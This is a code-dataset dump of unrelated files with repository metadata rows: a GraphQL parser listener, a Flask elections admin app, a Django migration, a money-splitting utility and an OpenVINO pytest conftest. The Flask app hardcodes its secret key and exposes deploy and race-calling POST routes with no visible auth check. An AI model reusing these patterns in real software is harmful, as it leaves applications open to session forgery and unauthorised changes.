# Exit a parse tree produced by GraphQLParser#schemaExtension.
def exitSchemaExtension(self, ctx:GraphQLParser.SchemaExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#operationTypeDefinition.
def enterOperationTypeDefinition(self, ctx:GraphQLParser.OperationTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#operationTypeDefinition.
def exitOperationTypeDefinition(self, ctx:GraphQLParser.OperationTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#description.
def enterDescription(self, ctx:GraphQLParser.DescriptionContext):
pass
# Exit a parse tree produced by GraphQLParser#description.
def exitDescription(self, ctx:GraphQLParser.DescriptionContext):
pass
# Enter a parse tree produced by GraphQLParser#typeDefinition.
def enterTypeDefinition(self, ctx:GraphQLParser.TypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeDefinition.
def exitTypeDefinition(self, ctx:GraphQLParser.TypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#typeExtension.
def enterTypeExtension(self, ctx:GraphQLParser.TypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeExtension.
def exitTypeExtension(self, ctx:GraphQLParser.TypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#scalarTypeDefinition.
def enterScalarTypeDefinition(self, ctx:GraphQLParser.ScalarTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#scalarTypeDefinition.
def exitScalarTypeDefinition(self, ctx:GraphQLParser.ScalarTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#scalarTypeExtension.
def enterScalarTypeExtension(self, ctx:GraphQLParser.ScalarTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#scalarTypeExtension.
def exitScalarTypeExtension(self, ctx:GraphQLParser.ScalarTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#objectTypeDefinition.
def enterObjectTypeDefinition(self, ctx:GraphQLParser.ObjectTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#objectTypeDefinition.
def exitObjectTypeDefinition(self, ctx:GraphQLParser.ObjectTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#implementsInterfaces.
def enterImplementsInterfaces(self, ctx:GraphQLParser.ImplementsInterfacesContext):
pass
# Exit a parse tree produced by GraphQLParser#implementsInterfaces.
def exitImplementsInterfaces(self, ctx:GraphQLParser.ImplementsInterfacesContext):
pass
# Enter a parse tree produced by GraphQLParser#fieldsDefinition.
def enterFieldsDefinition(self, ctx:GraphQLParser.FieldsDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#fieldsDefinition.
def exitFieldsDefinition(self, ctx:GraphQLParser.FieldsDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#fieldDefinition.
def enterFieldDefinition(self, ctx:GraphQLParser.FieldDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#fieldDefinition.
def exitFieldDefinition(self, ctx:GraphQLParser.FieldDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#argumentsDefinition.
def enterArgumentsDefinition(self, ctx:GraphQLParser.ArgumentsDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#argumentsDefinition.
def exitArgumentsDefinition(self, ctx:GraphQLParser.ArgumentsDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#inputValueDefinition.
def enterInputValueDefinition(self, ctx:GraphQLParser.InputValueDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#inputValueDefinition.
def exitInputValueDefinition(self, ctx:GraphQLParser.InputValueDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#objectTypeExtension.
def enterObjectTypeExtension(self, ctx:GraphQLParser.ObjectTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#objectTypeExtension.
def exitObjectTypeExtension(self, ctx:GraphQLParser.ObjectTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#interfaceTypeDefinition.
def enterInterfaceTypeDefinition(self, ctx:GraphQLParser.InterfaceTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#interfaceTypeDefinition.
def exitInterfaceTypeDefinition(self, ctx:GraphQLParser.InterfaceTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#interfaceTypeExtension.
def enterInterfaceTypeExtension(self, ctx:GraphQLParser.InterfaceTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#interfaceTypeExtension.
def exitInterfaceTypeExtension(self, ctx:GraphQLParser.InterfaceTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#unionTypeDefinition.
def enterUnionTypeDefinition(self, ctx:GraphQLParser.UnionTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#unionTypeDefinition.
def exitUnionTypeDefinition(self, ctx:GraphQLParser.UnionTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#unionMemberTypes.
def enterUnionMemberTypes(self, ctx:GraphQLParser.UnionMemberTypesContext):
pass
# Exit a parse tree produced by GraphQLParser#unionMemberTypes.
def exitUnionMemberTypes(self, ctx:GraphQLParser.UnionMemberTypesContext):
pass
# Enter a parse tree produced by GraphQLParser#unionTypeExtension.
def enterUnionTypeExtension(self, ctx:GraphQLParser.UnionTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#unionTypeExtension.
def exitUnionTypeExtension(self, ctx:GraphQLParser.UnionTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#enumTypeDefinition.
def enterEnumTypeDefinition(self, ctx:GraphQLParser.EnumTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#enumTypeDefinition.
def exitEnumTypeDefinition(self, ctx:GraphQLParser.EnumTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#enumValuesDefinition.
def enterEnumValuesDefinition(self, ctx:GraphQLParser.EnumValuesDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#enumValuesDefinition.
def exitEnumValuesDefinition(self, ctx:GraphQLParser.EnumValuesDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#enumValueDefinition.
def enterEnumValueDefinition(self, ctx:GraphQLParser.EnumValueDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#enumValueDefinition.
def exitEnumValueDefinition(self, ctx:GraphQLParser.EnumValueDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#enumTypeExtension.
def enterEnumTypeExtension(self, ctx:GraphQLParser.EnumTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#enumTypeExtension.
def exitEnumTypeExtension(self, ctx:GraphQLParser.EnumTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#inputObjectTypeDefinition.
def enterInputObjectTypeDefinition(self, ctx:GraphQLParser.InputObjectTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#inputObjectTypeDefinition.
def exitInputObjectTypeDefinition(self, ctx:GraphQLParser.InputObjectTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#inputFieldsDefinition.
def enterInputFieldsDefinition(self, ctx:GraphQLParser.InputFieldsDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#inputFieldsDefinition.
def exitInputFieldsDefinition(self, ctx:GraphQLParser.InputFieldsDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#inputObjectTypeExtension.
def enterInputObjectTypeExtension(self, ctx:GraphQLParser.InputObjectTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#inputObjectTypeExtension.
def exitInputObjectTypeExtension(self, ctx:GraphQLParser.InputObjectTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#directiveDefinition.
def enterDirectiveDefinition(self, ctx:GraphQLParser.DirectiveDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#directiveDefinition.
def exitDirectiveDefinition(self, ctx:GraphQLParser.DirectiveDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#directiveLocations.
def enterDirectiveLocations(self, ctx:GraphQLParser.DirectiveLocationsContext):
pass
# Exit a parse tree produced by GraphQLParser#directiveLocations.
def exitDirectiveLocations(self, ctx:GraphQLParser.DirectiveLocationsContext):
pass
# Enter a parse tree produced by GraphQLParser#directiveLocation.
def enterDirectiveLocation(self, ctx:GraphQLParser.DirectiveLocationContext):
pass
# Exit a parse tree produced by GraphQLParser#directiveLocation.
def exitDirectiveLocation(self, ctx:GraphQLParser.DirectiveLocationContext):
pass
# Enter a parse tree produced by GraphQLParser#executableDirectiveLocation.
def enterExecutableDirectiveLocation(self, ctx:GraphQLParser.ExecutableDirectiveLocationContext):
pass
# Exit a parse tree produced by GraphQLParser#executableDirectiveLocation.
def exitExecutableDirectiveLocation(self, ctx:GraphQLParser.ExecutableDirectiveLocationContext):
pass
# Enter a parse tree produced by GraphQLParser#typeSystemDirectiveLocation.
def enterTypeSystemDirectiveLocation(self, ctx:GraphQLParser.TypeSystemDirectiveLocationContext):
pass
# Exit a parse tree produced by GraphQLParser#typeSystemDirectiveLocation.
def exitTypeSystemDirectiveLocation(self, ctx:GraphQLParser.TypeSystemDirectiveLocationContext):
pass
# Enter a parse tree produced by GraphQLParser#name.
def enterName(self, ctx:GraphQLParser.NameContext):
pass
# Exit a parse tree produced by GraphQLParser#name.
def exitName(self, ctx:GraphQLParser.NameContext):
pass
del GraphQLParser | 35.299539 | 101 | 0.758964 |
a914383576c54aa31117d4d8b56250d201d6b25c | 355 | py | Python | tests/test_meshinery.py | drozdziak1/meshinery | 65d3e1eba071ddf4b803909e9d42ef61c4de22c1 | [
"MIT"
] | null | null | null | tests/test_meshinery.py | drozdziak1/meshinery | 65d3e1eba071ddf4b803909e9d42ef61c4de22c1 | [
"MIT"
] | null | null | null | tests/test_meshinery.py | drozdziak1/meshinery | 65d3e1eba071ddf4b803909e9d42ef61c4de22c1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_meshinery
----------------------------------
Tests for `meshinery` module.
"""
import unittest
import meshinery
class TestMeshinery(unittest.TestCase):
def setUp(self):
pass
def test_something(self):
assert(meshinery.__version__)
def tearDown(self):
pass
| 13.653846 | 39 | 0.583099 |
f80741a074820c036344c63bfcaa99ae45e9d2a4 | 5,571 | py | Python | admin_app.py | nprapps/elections14 | b89f65aa276eebb790594f456d58e741066c1f93 | [
"MIT"
] | 5 | 2015-01-23T19:23:21.000Z | 2015-05-01T17:15:13.000Z | admin_app.py | nprapps/elections14 | b89f65aa276eebb790594f456d58e741066c1f93 | [
"MIT"
] | 1 | 2015-02-04T18:58:40.000Z | 2015-02-04T18:58:40.000Z | admin_app.py | nprapps/elections14 | b89f65aa276eebb790594f456d58e741066c1f93 | [
"MIT"
] | 1 | 2021-02-23T10:25:25.000Z | 2021-02-23T10:25:25.000Z | #!/usr/bin/env python
import argparse
import datetime
import json
import logging
import subprocess
import boto
from boto.s3.key import Key
from fabfile import stack
from flask import Flask, render_template
from flask_peewee.auth import Auth
from flask_peewee.db import Database
from flask_peewee.admin import Admin, ModelAdmin
from models import Slide, SlideSequence, Race, Candidate
from peewee import fn
import app_config
from render_utils import make_context, urlencode_filter, smarty_filter
import static_app
app = Flask(__name__)
app.config['PROPAGATE_EXCEPTIONS'] = True
app.config['DATABASE'] = app_config.DATABASE
app.config['SECRET_KEY'] = 'askfhj3r3j'
app.jinja_env.filters['urlencode'] = urlencode_filter
app.jinja_env.filters['smarty'] = smarty_filter
app.register_blueprint(static_app.static_app, url_prefix='/%s' % app_config.PROJECT_SLUG)
file_handler = logging.FileHandler('%s/app.log' % app_config.SERVER_LOG_PATH)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
class SlideAdmin(ModelAdmin):
exclude = ('slug',)
# Set up flask peewee db wrapper
db = Database(app)
auth = Auth(app, db, prefix='/%s/accounts' % app_config.PROJECT_SLUG)
admin = Admin(app, auth, prefix='/%s/admin' % app_config.PROJECT_SLUG)
admin.register(Slide, SlideAdmin)
admin.register(SlideSequence)
admin.setup()
@app.route('/%s/admin/stack/' % app_config.PROJECT_SLUG, methods=['GET'])
def _stack():
"""
Administer a stack of slides.
"""
context = make_context(asset_depth=1)
sequence = SlideSequence.select()
sequence_dicts = sequence.dicts()
time = 0
for slide in sequence:
time += slide.slide.time_on_screen
for slide_dict in sequence_dicts:
for slide in sequence:
if slide.slide.slug == slide_dict['slide']:
slide_dict['name'] = slide.slide.name
slide_dict['time_on_screen'] = slide.slide.time_on_screen
if slide_dict['slide'].startswith('tumblr'):
slide_dict['news_item'] = True
context.update({
'sequence': sequence_dicts,
'slides': Slide.select().dicts(),
'graphics': Slide.select().where(fn.Lower(fn.Substr(Slide.slug, 1, 6)) != 'tumblr').order_by(Slide.slug).dicts(),
'news': Slide.select().where(fn.Lower(fn.Substr(Slide.slug, 1, 6)) == 'tumblr').order_by(Slide.slug.desc()).dicts(),
'time': time,
})
return render_template('admin/stack.html', **context)
@app.route('/%s/admin/stack/save' % app_config.PROJECT_SLUG, methods=['POST'])
def save_stack():
"""
Save new stack sequence.
"""
from flask import request
data = request.json
SlideSequence.delete().execute()
# Rebuild sequence table
for i, row in enumerate(data[0]):
SlideSequence.create(order=i, slide=row['slide'])
stack.deploy()
return "Saved sequence"
@app.route('/%s/admin/chamber/<chamber>/' % app_config.PROJECT_SLUG, methods=['GET'])
def chamber(chamber):
"""
Read/update list of chamber candidates.
"""
chamber_slug = 'H'
if chamber == 'senate':
chamber_slug = 'S'
elif chamber == 'governor':
chamber_slug = 'G'
races = Race.select().where(Race.office_id == chamber_slug).order_by(Race.state_postal, Race.seat_number)
context = make_context(asset_depth=1)
context.update({
'races': races,
'chamber': chamber,
})
return render_template('admin/chamber.html', **context)
@app.route('/%s/admin/chamber/<chamber>/call/' % app_config.PROJECT_SLUG, methods=['POST'])
def chamber_call(chamber):
from flask import request
race_slug = request.form.get('race_slug', None)
race = Race.get(Race.slug == race_slug)
# Toggling accept AP call
accept_ap_call = request.form.get('accept_ap_call', None)
if accept_ap_call != None:
if accept_ap_call.lower() == 'true':
accept_ap_call = True
else:
accept_ap_call = False
if race_slug != None and accept_ap_call != None:
race.accept_ap_call = accept_ap_call
race.save()
if accept_ap_call == True:
Candidate.update(npr_winner=False).where(Candidate.race == race).execute()
# Setting NPR winner
first_name = request.form.get('first_name', None)
last_name = request.form.get('last_name', None)
clear_all = request.form.get('clear_all', None)
if race_slug != None and clear_all != None:
if clear_all == 'true':
Candidate.update(npr_winner=False).where(Candidate.race == race).execute()
race.npr_called = False
race.save()
if race_slug != None and first_name != None and last_name != None:
Candidate.update(npr_winner=False).where(Candidate.race == race).execute()
Candidate.update(npr_winner=True).where(
Candidate.race == race,
Candidate.first_name == first_name,
Candidate.last_name == last_name
).execute()
race.npr_called = True
if race.accept_ap_call == False:
if race.npr_called_time == None:
race.npr_called_time = datetime.datetime.utcnow()
race.save()
return 'Success'
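# Illustrative request (an assumption with placeholder values -- the real URL prefix
# comes from app_config.PROJECT_SLUG): calling an NPR winner for a race might look like
#
#   curl -X POST http://localhost:8080/<project-slug>/admin/chamber/senate/call/ \
#        -d "race_slug=<race-slug>" -d "first_name=Jane" -d "last_name=Doe"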
# Boilerplate
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port')
args = parser.parse_args()
server_port = 8080
if args.port:
server_port = int(args.port)
app.run(host='0.0.0.0', port=server_port, debug=app_config.DEBUG)
| 29.321053 | 125 | 0.666846 |
76cd569bad8ab91584a795c6a542aba65b1ac9a2 | 1,775 | py | Python | core/migrations/0002_auto_20190606_0041.py | MubongwoNdasi/pms | 0cc5dcbc25b31e13631672e1a03c88e2ad46bc92 | [
"MIT"
] | null | null | null | core/migrations/0002_auto_20190606_0041.py | MubongwoNdasi/pms | 0cc5dcbc25b31e13631672e1a03c88e2ad46bc92 | [
"MIT"
] | 8 | 2021-03-18T22:27:44.000Z | 2022-02-10T09:18:50.000Z | core/migrations/0002_auto_20190606_0041.py | MubongwoNdasi/pms | 0cc5dcbc25b31e13631672e1a03c88e2ad46bc92 | [
"MIT"
] | 1 | 2021-09-20T06:37:41.000Z | 2021-09-20T06:37:41.000Z | # Generated by Django 2.2 on 2019-06-06 00:41
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='city',
name='created_on',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'),
preserve_default=False,
),
migrations.AddField(
model_name='city',
name='updated_on',
field=models.DateTimeField(auto_now=True, verbose_name='updated on'),
),
migrations.AddField(
model_name='pharmacy',
name='created_on',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'),
preserve_default=False,
),
migrations.AddField(
model_name='pharmacy',
name='updated_on',
field=models.DateTimeField(auto_now=True, verbose_name='updated on'),
),
migrations.AddField(
model_name='pharmacyuser',
name='updated_on',
field=models.DateTimeField(auto_now=True, verbose_name='updated on'),
),
migrations.AddField(
model_name='profile',
name='created_on',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'),
preserve_default=False,
),
migrations.AddField(
model_name='profile',
name='updated_on',
field=models.DateTimeField(auto_now=True, verbose_name='updated on'),
),
]
| 33.490566 | 118 | 0.59831 |
8cb365ec060514af9641d7684391a9a21a75c0d6 | 2,089 | py | Python | hordak/utilities/money.py | PetrDlouhy/django-hordak | 71c141928c5a2cc102bcfd710d7bdf17093933c9 | [
"MIT"
] | 2 | 2016-09-05T08:58:53.000Z | 2016-09-26T10:49:07.000Z | hordak/utilities/money.py | PetrDlouhy/django-hordak | 71c141928c5a2cc102bcfd710d7bdf17093933c9 | [
"MIT"
] | 3 | 2016-11-06T13:14:29.000Z | 2016-11-06T13:57:58.000Z | hordak/utilities/money.py | waldocollective/django-hordak | dc9b8e5008954ca0f4b089d89348e7dec4301f65 | [
"MIT"
] | null | null | null | from decimal import Decimal
from hordak.defaults import DECIMAL_PLACES
def ratio_split(amount, ratios):
"""Split in_value according to the ratios specified in `ratios`
This is special in that it ensures the returned values always sum to
in_value (i.e. we avoid losses or gains due to rounding errors). As a
result, this method returns a list of `Decimal` values with length equal
to that of `ratios`.
Examples:
.. code-block:: python
>>> from hordak.utilities.money import ratio_split
>>> from decimal import Decimal
>>> ratio_split(Decimal('10'), [Decimal('1'), Decimal('2')])
[Decimal('3.33'), Decimal('6.67')]
Note the returned values sum to the original input of ``10``. If we were to
do this calculation in a naive fashion then the returned values would likely
    be ``3.33`` and ``6.66``, which would sum to ``9.99``, thereby losing
``0.01``.
Args:
amount (Decimal): The amount to be split
ratios (list[Decimal]): The ratios that will determine the split
Returns: list(Decimal)
"""
precision = Decimal(10) ** Decimal(-DECIMAL_PLACES)
assert amount == amount.quantize(precision)
# Distribute the amount according to the ratios:
ratio_total = sum(ratios)
values = [amount * ratio / ratio_total for ratio in ratios]
# Now round the values to the desired number of decimal places:
rounded = [v.quantize(precision) for v in values]
# The rounded values may not add up to the exact amount.
# Use the Largest Remainder algorithm to distribute the
# difference between participants with non-zero ratios:
participants = [i for i in range(len(ratios)) if ratios[i] != Decimal(0)]
for p in sorted(participants, key=lambda i: rounded[i] - values[i]):
total = sum(rounded)
if total < amount:
rounded[p] += precision
elif total > amount:
rounded[p] -= precision
else:
break
assert sum(rounded) == amount
return rounded
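# Illustrative usage sketch (an addition for clarity, not part of the original
# module; the concrete rounding below assumes the default of 2 decimal places):
def _ratio_split_example():
    # Splitting 100.00 three equal ways rounds each share to 33.33, totalling only
    # 99.99; the largest-remainder pass hands the leftover 0.01 to one participant
    # so that the shares sum to exactly 100.00.
    shares = ratio_split(Decimal("100.00"), [Decimal(1), Decimal(1), Decimal(1)])
    assert sum(shares) == Decimal("100.00")
    return shares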
| 34.245902 | 84 | 0.646721 |
086d6848084d97850897bbe6d6c6676fd8676882 | 13,044 | py | Python | tests/time_tests/test_runner/conftest.py | maksimvlasov/openvino | be8600af38dd6ab39422b3db496c0fb73c156938 | [
"Apache-2.0"
] | 1 | 2021-07-14T07:20:24.000Z | 2021-07-14T07:20:24.000Z | tests/time_tests/test_runner/conftest.py | maksimvlasov/openvino | be8600af38dd6ab39422b3db496c0fb73c156938 | [
"Apache-2.0"
] | 35 | 2020-11-13T16:32:58.000Z | 2022-03-12T15:05:16.000Z | tests/time_tests/test_runner/conftest.py | sungeunk/openvino | c55291d62fced468570d15594738a7db6ef31c9d | [
"Apache-2.0"
] | 1 | 2021-01-21T12:09:13.000Z | 2021-01-21T12:09:13.000Z | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
"""
Basic high-level plugin file for pytest.
See [Writing plugins](https://docs.pytest.org/en/latest/writing_plugins.html)
for more information.
This plugin adds the following command-line options:
* `--test_conf` - Path to test configuration file. Used to parametrize tests.
Format: YAML file.
* `--exe` - Path to a timetest binary to execute.
* `--niter` - Number of times to run executable.
"""
import hashlib
import json
import logging
# pylint:disable=import-error
import os
import shutil
import sys
import tempfile
from pathlib import Path
import pytest
import yaml
from jsonschema import validate, ValidationError
# add utils folder to imports
UTILS_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), "utils")
sys.path.insert(0, str(UTILS_DIR))
from path_utils import check_positive_int
from platform_utils import get_os_name, get_os_version, get_cpu_info
from utils import upload_data, metadata_from_manifest, DB_COLLECTIONS
# -------------------- CLI options --------------------
def pytest_addoption(parser):
"""Specify command-line options for all plugins"""
test_args_parser = parser.getgroup("timetest test run")
test_args_parser.addoption(
"--test_conf",
type=Path,
help="path to a test config",
default=Path(__file__).parent / "test_config.yml"
)
test_args_parser.addoption(
"--exe",
required=True,
dest="executable",
type=Path,
help="path to a timetest binary to execute"
)
test_args_parser.addoption(
"--niter",
type=check_positive_int,
help="number of iterations to run executable and aggregate results",
default=3
)
db_args_parser = parser.getgroup("timetest database use")
db_args_parser.addoption(
'--db_submit',
metavar="RUN_ID",
type=str,
help='submit results to the database. ' \
'`RUN_ID` should be a string uniquely identifying the run' \
' (like Jenkins URL or time)'
)
is_db_used = db_args_parser.parser.parse_known_args(sys.argv).db_submit
db_args_parser.addoption(
'--db_url',
type=str,
required=is_db_used,
help='MongoDB URL in a form "mongodb://server:port"'
)
db_args_parser.addoption(
'--db_collection',
type=str,
required=is_db_used,
help='collection name in database',
choices=DB_COLLECTIONS
)
db_args_parser.addoption(
'--db_metadata',
type=str,
default=None,
help='path to JSON-formatted file to extract additional information')
db_args_parser.addoption(
'--manifest',
type=Path,
required=is_db_used,
help='path to build manifest to extract commit information')
@pytest.fixture(scope="session")
def test_conf(request):
"""Fixture function for command-line option."""
return request.config.getoption('test_conf')
@pytest.fixture(scope="session")
def executable(request):
"""Fixture function for command-line option."""
return request.config.getoption('executable')
@pytest.fixture(scope="session")
def niter(request):
"""Fixture function for command-line option."""
return request.config.getoption('niter')
# -------------------- CLI options --------------------
@pytest.fixture(scope="function")
def temp_dir(pytestconfig):
"""Create temporary directory for test purposes.
It will be cleaned up after every test run.
"""
temp_dir = tempfile.TemporaryDirectory()
yield Path(temp_dir.name)
temp_dir.cleanup()
@pytest.fixture(scope="function")
def cl_cache_dir(pytestconfig, instance):
"""Generate directory to save OpenCL cache before test run and clean up after run.
Folder `cl_cache` should be created in a directory where tests were run. In this case
cache will be saved correctly. This behaviour is OS independent.
More: https://github.com/intel/compute-runtime/blob/master/opencl/doc/FAQ.md#how-can-cl_cache-be-enabled
"""
if instance["device"]["name"] == "GPU":
cl_cache_dir = pytestconfig.invocation_dir / "cl_cache"
# if cl_cache generation to a local `cl_cache` folder doesn't work, specify
# `cl_cache_dir` environment variable in an attempt to fix it (Linux specific)
os.environ["cl_cache_dir"] = str(cl_cache_dir)
if cl_cache_dir.exists():
shutil.rmtree(cl_cache_dir)
cl_cache_dir.mkdir()
logging.info("cl_cache will be created in {}".format(cl_cache_dir))
yield cl_cache_dir
shutil.rmtree(cl_cache_dir)
else:
yield None
@pytest.fixture(scope="function")
def model_cache_dir(pytestconfig, instance):
"""
Generate directory to IE model cache before test run and clean up after run.
"""
if instance.get("use_model_cache"):
model_cache_dir = pytestconfig.invocation_dir / "models_cache"
if model_cache_dir.exists():
shutil.rmtree(model_cache_dir)
model_cache_dir.mkdir()
logging.info("model_cache will be created in {}".format(model_cache_dir))
yield model_cache_dir
shutil.rmtree(model_cache_dir)
else:
yield None
@pytest.fixture(scope="function")
def test_info(request, pytestconfig):
"""Fixture for collecting timetests information.
Current fixture fills in `request` and `pytestconfig` global
fixtures with timetests information which will be used for
internal purposes.
"""
setattr(request.node._request, "test_info", {"results": {},
"raw_results": {},
"db_info": {}})
yield request.node._request.test_info
@pytest.fixture(scope="function")
def validate_test_case(request, test_info):
"""Fixture for validating test case on correctness.
    Fixture checks that the current test case contains all fields required
    for it to work correctly.
"""
schema = """
{
"type": "object",
"properties": {
"device": {
"type": "object",
"properties": {
"name": {"type": "string"}
},
"required": ["name"]
},
"model": {
"type": "object",
"properties": {
"path": {"type": "string"}
},
"required": ["path"]
}
},
"required": ["device", "model"],
"additionalProperties": true
}
"""
schema = json.loads(schema)
try:
validate(instance=request.node.funcargs["instance"], schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield
@pytest.fixture(scope="function")
def prepare_db_info(request, test_info, executable, niter, manifest_metadata):
"""Fixture for preparing and validating data to submit to a database.
    Fixture prepares data and metadata to submit to a database. One of the steps
    is parsing build information from the build manifest. After preparation,
    it checks that the data contains the required properties.
"""
FIELDS_FOR_ID = ['run_id', 'timetest', 'model', 'device', 'niter']
run_id = request.config.getoption("db_submit")
if not run_id:
yield
return
# add db_metadata
db_meta_path = request.config.getoption("db_metadata")
if db_meta_path:
with open(db_meta_path, "r") as db_meta_f:
test_info["db_info"].update(json.load(db_meta_f))
# add test info
info = {
# results will be added immediately before uploading to DB in `pytest_runtest_makereport`
"run_id": run_id,
"timetest": str(executable.stem),
"model": request.node.funcargs["instance"]["model"],
"device": request.node.funcargs["instance"]["device"],
"niter": niter,
"test_name": request.node.name,
"os": "_".join([str(item) for item in [get_os_name(), *get_os_version()]])
}
info['_id'] = hashlib.sha256(
''.join([str(info[key]) for key in FIELDS_FOR_ID]).encode()).hexdigest()
test_info["db_info"].update(info)
# add manifest metadata
test_info["db_info"].update(manifest_metadata)
# validate db_info
schema = """
{
"type": "object",
"properties": {
"device": {
"type": "object",
"properties": {
"name": {"type": "string"}
},
"required": ["name"]
},
"model": {
"type": "object",
"properties": {
"path": {"type": "string"},
"name": {"type": "string"},
"precision": {"type": "string"},
"framework": {"type": "string"}
},
"required": ["path", "name", "precision", "framework"]
},
"run_id": {"type": "string"},
"timetest": {"type": "string"},
"niter": {"type": "integer"},
"test_name": {"type": "string"},
"results": {"type": "object"},
"os": {"type": "string"},
"_id": {"type": "string"}
},
"required": ["device", "model", "run_id", "timetest", "niter", "test_name", "os", "_id"],
"additionalProperties": true
}
"""
schema = json.loads(schema)
try:
validate(instance=test_info["db_info"], schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield
@pytest.fixture(scope="session", autouse=True)
def manifest_metadata(request):
"""Fixture function for command-line option."""
run_id = request.config.getoption("db_submit")
if not run_id:
yield
return
manifest_meta = metadata_from_manifest(request.config.getoption("manifest"))
schema = """
{
"type": "object",
"properties": {
"product_type": {"enum": ["private_linux_ubuntu_18_04", "private_windows_vs2019"]},
"repo_url": {"type": "string"},
"commit_sha": {"type": "string"},
"commit_date": {"type": "string"},
"branch": {"type": "string"},
"target_branch": {"type": "string"},
"version": {"type": "string"}
},
"required": ["product_type", "repo_url", "commit_sha", "commit_date", "branch", "target_branch", "version"],
"additionalProperties": false
}
"""
schema = json.loads(schema)
try:
validate(instance=manifest_meta, schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield manifest_meta
def pytest_generate_tests(metafunc):
"""Pytest hook for test generation.
Generate parameterized tests from discovered modules and test config
parameters.
"""
with open(metafunc.config.getoption('test_conf'), "r") as file:
test_cases = yaml.safe_load(file)
if test_cases:
metafunc.parametrize("instance", test_cases)
def pytest_make_parametrize_id(config, val, argname):
"""Pytest hook for user-friendly test name representation"""
def get_dict_values(d):
"""Unwrap dictionary to get all values of nested dictionaries"""
if isinstance(d, dict):
for v in d.values():
yield from get_dict_values(v)
else:
yield d
keys = ["device", "model"]
values = {key: val[key] for key in keys}
values = list(get_dict_values(values))
return "-".join(["_".join([key, str(val)]) for key, val in zip(keys, values)])
@pytest.mark.hookwrapper
def pytest_runtest_makereport(item, call):
"""Pytest hook for report preparation.
Submit tests' data to a database.
"""
run_id = item.config.getoption("db_submit")
if not run_id:
yield
return
data = item._request.test_info["db_info"].copy()
data["results"] = item._request.test_info["results"].copy()
data["raw_results"] = item._request.test_info["raw_results"].copy()
data["cpu_info"] = get_cpu_info()
data["status"] = "not_finished"
data["error_msg"] = ""
report = (yield).get_result()
if call.when in ["setup", "call"]:
if call.when == "call":
if not report.passed:
data["status"] = "failed"
data["error_msg"] = report.longrepr.reprcrash.message
else:
data["status"] = "passed"
db_url = item.config.getoption("db_url")
db_collection = item.config.getoption("db_collection")
logging.info("Upload data to {}/{}.{}. Data: {}".format(db_url, 'timetests', db_collection, data))
upload_data(data, db_url, 'timetests', db_collection)
| 32.773869 | 120 | 0.605259 |
71e45913a166035d9487fd3d45450c75b60c96ae | 6,753 | py | Python | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | cloudcomputingabc/volttron | 6495e26e3185a7af8d0d79ad2586bdf8ea83992d | [
"Apache-2.0",
"BSD-2-Clause"
